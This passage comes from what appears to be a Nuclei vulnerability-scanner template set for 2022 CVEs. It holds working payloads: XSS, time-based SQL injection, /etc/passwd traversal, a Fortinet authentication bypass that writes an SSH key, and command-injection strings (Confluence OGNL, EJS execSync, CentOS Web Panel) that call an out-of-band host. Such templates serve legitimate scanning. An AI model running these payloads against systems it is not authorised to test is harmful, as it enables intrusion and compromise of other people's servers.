error\")"],"condition":"and"}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28923","info":{"name":"Caddy 2.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(5)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1390","info":{"name":"WordPress Admin Word Count Column 2.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>confirm(document.domain)</script>","updraftplus"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31983","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=requests/manage_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Request Detail\")"],"condition":"and"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config 